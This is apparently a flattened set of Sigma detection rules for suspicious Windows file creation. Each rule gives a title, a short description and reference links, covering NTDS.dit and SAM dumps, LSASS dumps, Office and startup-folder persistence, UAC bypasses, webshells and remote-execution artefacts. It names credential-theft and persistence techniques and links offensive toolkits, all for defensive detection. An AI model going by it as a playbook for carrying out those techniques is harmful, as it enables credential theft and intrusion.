NTDS.DIT Creation By Uncommon Parent Process Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/, https://pentestlab.blog/tag/ntds-dit/, https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1
NTDS.DIT Creation By Uncommon Process Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/, https://adsecurity.org/?p=2398
NTDS Exfiltration Filename Patterns Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration. https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb, https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1, https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405
Office Macro File Creation Detects the creation of new Office macro files on the system https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md, https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference
Potential Persistence Via Microsoft Office Add-In Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel). Internal Research, https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence, https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md
Office Macro File Download Detects the creation of new Office macro files on the system via an application (browser, mail client). https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md, https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference
Office Macro File Creation From Suspicious Process Detects the creation of an Office macro file by a suspicious process https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md, https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference
OneNote Attachment File Dropped In Suspicious Location Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/, https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/
Suspicious File Created Via OneNote Application Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/, https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/, https://twitter.com/MaD_c4t/status/1623414582382567424, https://labs.withsecure.com/publications/detecting-onenote-abuse, https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/, https://app.any.run/tasks/17f2d378-6d11-4d6f-8340-954b04f35e83/
New Outlook Macro Created Detects the creation of a macro file for Outlook. https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/
.RDP File Created by Outlook Process Detects the creation of files with the ".rdp" extensions in the temporary directory that Outlook uses when opening attachments. This can be used to detect spear-phishing campaigns that use RDP files as attachments. https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/, https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/, https://www.linkedin.com/feed/update/urn:li:ugcPost:7257437202706493443?commentUrn=urn%3Ali%3Acomment%3A%28ugcPost%3A7257437202706493443%2C7257522819985543168%29&dashCommentUrn=urn%3Ali%3Afsd_comment%3A%287257522819985543168%2Curn%3Ali%3AugcPost%3A7257437202706493443%29
PCRE.NET Package Temp Files Detects processes creating temp files related to PCRE.NET package https://twitter.com/rbmaslen/status/1321859647091970051, https://twitter.com/tifkin_/status/1321916444557365248
Suspicious Outlook Macro Created Detects the creation of a macro file for Outlook. https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53, https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/
Publisher Attachment File Dropped In Suspicious Location Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents https://twitter.com/EmericNasi/status/1623224526220804098
Potential Persistence Via Microsoft Office Startup Folder Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence. https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies, https://learn.microsoft.com/en-us/office/troubleshoot/excel/use-startup-folders
File With Uncommon Extension Created By An Office Application Detects the creation of files with an executable or script extension by an Office application. https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
Uncommon File Created In Office Startup Folder Detects the creation of a file with an uncommon extension in an Office application startup folder https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/, http://addbalance.com/word/startup.htm, https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3, https://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions
Potential Persistence Via Outlook Form Detects the creation of a new Outlook form which can contain malicious code https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79, https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form, https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/
Suspicious File Created In PerfLogs Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files Internal Research, https://labs.withsecure.com/publications/fin7-target-veeam-servers
Potential Binary Or Script Dropper Via PowerShell Detects PowerShell creating a binary executable or a script file. https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
PowerShell Script Dropped Via PowerShell.EXE Detects PowerShell creating a PowerShell file (.ps1). While this behavior is often benign, it can sometimes be a sign of a dropper script trying to achieve persistence. https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
Malicious PowerShell Scripts - FileCreation Detects the creation of known offensive powershell scripts used for exploitation https://github.com/PowerShellMafia/PowerSploit, https://github.com/NetSPI/PowerUpSQL, https://github.com/CsEnox/EventViewer-UACBypass, https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu, https://github.com/nettitude/Invoke-PowerThIEf, https://github.com/S3cur3Th1sSh1t/WinPwn, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat, https://github.com/Kevin-Robertson/Powermad, https://github.com/adrecon/ADRecon, https://github.com/adrecon/AzureADRecon
PowerShell Module File Created Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. Internal Research, https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3
PowerShell Module File Created By Non-PowerShell Process Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process Internal Research, https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3
Potential Suspicious PowerShell Module File Created Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is a somewhat uncommon practice, as legitimate modules often include a version folder. Internal Research, https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3
Potential Startup Shortcut Persistence Via PowerShell.EXE Detects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" https://redcanary.com/blog/intelligence-insights-october-2021/, https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder
PSScriptPolicyTest Creation By Uncommon Process Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft PowerShell to test against AppLocker. https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/
Rclone Config File Creation Detects Rclone config files being created https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
.RDP File Created By Uncommon Application Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files. https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/, https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/
Potential Winnti Dropper Activity Detects files dropped by Winnti as described in RedMimicry Winnti playbook https://redmimicry.com/posts/redmimicry-winnti/#dropper
PDF File Created By RegEdit.EXE Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process. This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses. https://sensepost.com/blog/2024/dumping-lsa-secrets-a-story-about-task-decorrelation/
RemCom Service File Creation Detects default RemCom service filename which indicates RemCom service installation and execution https://github.com/kavika13/RemCom/
ScreenConnect Temporary Installation Artefact An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows
Remote Access Tool - ScreenConnect Temporary File Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has a feature to remotely execute binaries on a target machine. These binaries are dropped to ":\Users\\Documents\ConnectWiseControl\Temp\" before execution. https://github.com/SigmaHQ/sigma/pull/4467
Potential RipZip Attack on Startup Folder Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation. https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19
Potential SAM Database Dump Detects the creation of files that look like exports of the local SAM (Security Account Manager) https://github.com/search?q=CVE-2021-36934, https://web.archive.org/web/20210725081645/https://github.com/cube0x0/CVE-2021-36934, https://www.google.com/search?q=%22reg.exe+save%22+sam, https://github.com/HuskyHacks/ShadowSteal, https://github.com/FireFart/hivenightmare
Self Extraction Directive File Created In Potentially Suspicious Location Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html, https://en.wikipedia.org/wiki/IExpress, https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior
Windows Shell/Scripting Application File Write to Suspicious Folder Detects Windows shells and scripting applications that write files to suspicious folders Internal Research
Windows Binaries Write Suspicious Extensions Detects Windows executables that write files with suspicious extensions Internal Research
Startup Folder File Write A general detection for files being created in the Windows startup directory. This could be an indicator of persistence. https://github.com/OTRF/detection-hackathon-apt29/issues/12, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md
Suspicious Creation with Colorcpl Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\ https://twitter.com/eral4m/status/1480468728324231172?s=20
Created Files by Microsoft Sync Center This rule detects suspicious files created by Microsoft Sync Center (mobsync) https://redcanary.com/blog/intelligence-insights-november-2021/
Suspicious Files in Default GPO Folder Detects the creation of copies of suspicious files (EXE/DLL) in the default GPO storage folder https://redcanary.com/blog/intelligence-insights-november-2021/
Suspicious Desktopimgdownldr Target File Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/, https://twitter.com/SBousseaden/status/1278977301745741825
Suspicious desktop.ini Action Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/
Suspicious Creation TXT File in User Desktop Ransomware creates a TXT file on the user's Desktop https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note
Creation of a Diagcab Detects the creation of a diagcab file, which could be caused by some legitimate installer or be a sign of exploitation (review the filename and its location) https://threadreaderapp.com/thread/1533879688141086720.html
DPAPI Backup Keys And Certificate Export Activity IOC Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates. https://www.dsinternals.com/en/dpapi-backup-key-theft-auditing/, https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.Common/Data/DPAPI/DPAPIBackupKey.cs#L28-L32
Suspicious Double Extension Files Detects dropped files with double extensions, which are often used by malware as a method to abuse the fact that Windows hides file extensions by default. https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/, https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations, https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles, https://twitter.com/malwrhunterteam/status/1235135745611960321, https://twitter.com/luc4m/status/1073181154126254080
Suspicious MSExchangeMailboxReplication ASPX Write Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .aspx files to disk, which could be a sign of ProxyShell exploitation https://redcanary.com/blog/blackbyte-ransomware/
Suspicious Executable File Creation Detects the creation of suspicious executable file names. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths. https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae, https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/
Suspicious Get-Variable.exe Creation Get-Variable is a valid PowerShell cmdlet. WindowsApps is by default in the path where PowerShell is executed, so when the Get-Variable command is issued on PowerShell execution, the system first looks for a Get-Variable executable in the path and executes the malicious binary instead of resolving the PowerShell cmdlet. https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/, https://www.joesandbox.com/analysis/465533/0/html
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream Detects the creation of a hidden file or folder with the "::$index_allocation" stream, which can be used as a technique to prevent access to folders and files from tooling such as "explorer.exe" and "powershell.exe" https://twitter.com/pfiatde/status/1681977680688738305, https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/, https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/, https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3
Potential Homoglyph Attack Using Lookalike Characters in Filename Detects the presence of Unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus make excellent candidates for homoglyph attacks. https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish, http://www.irongeek.com/homoglyph-attack-generator.php
Legitimate Application Dropped Archive Detects programs on a Windows system that should not write an archive to disk https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
Legitimate Application Dropped Executable Detects programs on a Windows system that should not write executables to disk https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
Legitimate Application Dropped Script Detects programs on a Windows system that should not write scripts to disk https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
Suspicious LNK Double Extension File Created Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default. https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/, https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations, https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles, https://twitter.com/malwrhunterteam/status/1235135745611960321, https://twitter.com/luc4m/status/1073181154126254080
Suspicious PFX File Creation A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file. https://github.com/OTRF/detection-hackathon-apt29/issues/14, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.md
PowerShell Profile Modification Detects the creation or modification of a PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/, https://persistence-info.github.io/Data/powershellprofile.html
Suspicious PROCEXP152.sys File Created In TMP Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU. https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/
Suspicious File Creation Activity From Fake Recycle.Bin Folder Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware https://www.mandiant.com/resources/blog/infected-usb-steal-secrets, https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/
Potential File Extension Spoofing Using Right-to-Left Override Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extension. https://redcanary.com/blog/right-to-left-override/, https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method
Drop Binaries Into Spool Drivers Color Folder Detects the creation of suspicious binary files inside the "\windows\system32\spool\drivers\color\" folder, as seen in the blog referenced below https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/
Suspicious Startup Folder Persistence Detects when a file with a suspicious extension is created in the startup folder https://github.com/last-byte/PersistenceSniper
Suspicious Scheduled Task Write to System32 Tasks Detects the creation of tasks from processes executed from suspicious locations Internal Research
Suspicious Interactive PowerShell as SYSTEM Detects the creation of files that indicate interactive use of PowerShell in the SYSTEM user context https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm
TeamViewer Remote Session Detects the creation of log files during a TeamViewer remote session https://www.teamviewer.com/en-us/
VsCode Powershell Profile Modification Detects the creation or modification of a VSCode-related PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2
Windows Terminal Profile Settings Modification By Uncommon Process Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process. https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1547.015/T1547.015.md#atomic-test-1---persistence-by-modifying-windows-terminal-profile, https://twitter.com/nas_bench/status/1550836225652686848
WinSxS Executable File Creation By Non-System Process Detects the creation of binaries in the WinSxS folder by non-system processes https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
LiveKD Kernel Memory Dump File Created Detects the creation of a file that has the same name as the default LiveKD kernel memory dump. Internal Research
LiveKD Driver Creation Detects the creation of the LiveKD driver, which is used for live kernel debugging Internal Research
LiveKD Driver Creation By Uncommon Process Detects the creation of the LiveKD driver by a process image other than "livekd.exe". Internal Research
Process Explorer Driver Creation By Non-Sysinternals Binary Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, dropping it to disk for a few moments, running a service using that driver and removing it afterwards. https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer, https://github.com/Yaxser/Backstab, https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks, https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/
Process Monitor Driver Creation By Non-Sysinternals Binary Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself. Internal Research
PsExec Service File Creation Detects default PsExec service filename which indicates PsExec service installation and execution https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet
PSEXEC Remote Execution File Artefact Detects creation of the PSEXEC key file, which is created any time a PsExec command is executed. It gets written to the file system and is recorded in the USN Journal on the target system https://aboutdfir.com/the-key-to-identify-psexec/, https://twitter.com/davisrichardg/status/1616518800584704028
Potential Privilege Escalation Attempt Via .Exe.Local Technique Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll" https://github.com/binderlabs/DirCreate2System, https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt
LSASS Process Memory Dump Creation Via Taskmgr.EXE Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager. https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1003.001/T1003.001.md#L1
Hijack Legit RDP Session to Move Laterally Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder Internal Research
UAC Bypass Using Consent and Comctl32 - File Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) https://github.com/hfiref0x/UACME
UAC Bypass Using .NET Code Profiler on MMC Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39) https://github.com/hfiref0x/UACME
UAC Bypass Using EventVwr Detects the pattern of a UAC bypass using Windows Event Viewer https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw, https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g, https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute
UAC Bypass Using IDiagnostic Profile - File Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique https://github.com/Wh04m1001/IDiagnosticProfileUAC
UAC Bypass Using IEInstal - File Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) https://github.com/hfiref0x/UACME
UAC Bypass Using MSConfig Token Modification - File Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) https://github.com/hfiref0x/UACME
UAC Bypass Using NTFS Reparse Point - File Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) https://github.com/hfiref0x/UACME
UAC Bypass Abusing Winsat Path Parsing - File Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) https://github.com/hfiref0x/UACME
UAC Bypass Using Windows Media Player - File Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) https://github.com/hfiref0x/UACME
Creation of WerFault.exe/Wer.dll in Unusual Folder Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking. https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/
VHD Image Download Via Browser Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls. https://redcanary.com/blog/intelligence-insights-october-2021/, https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/, https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Visual Studio Code Tunnel Remote File Creation Detects the creation of a file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via the VsCode tunnel feature Internal Research
Renamed VsCode Code Tunnel Execution - File Indicator Detects the creation of a file with the name "code_tunnel.json", which indicates execution and usage of the VsCode tunneling utility by an "Image" or "Process" other than VsCode. https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html
Potential Webshell Creation On Static Website Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell. PT ESC rule and personal experience, https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md
AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
Wmiexec Default Output File Detects the creation of the default output filename used by the wmiexec tool https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/, https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py
Wmiprvse Wbemcomn DLL Hijack - File Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html
WMI Persistence - Script Event Consumer File Write Detects file writes of WMI script event consumer https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
UEFI Persistence Via Wpbbin - FileCreation Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory, which could be indicative of a UEFI-based persistence method https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c, https://persistence-info.github.io/Data/wpbbin.html
Writing Local Admin Share Adversaries may write to the local admin share to interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share
Potentially Suspicious Self Extraction Directive File Created Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stands for Self Extraction Directive files. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. Usually ".sed" files are simple INI files and not PE binaries. https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html, https://en.wikipedia.org/wiki/IExpress, https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior
DLL Loaded From Suspicious Location Via Cmspt.EXE Detects cmstp loading "dll" or "ocx" files from suspicious locations https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml
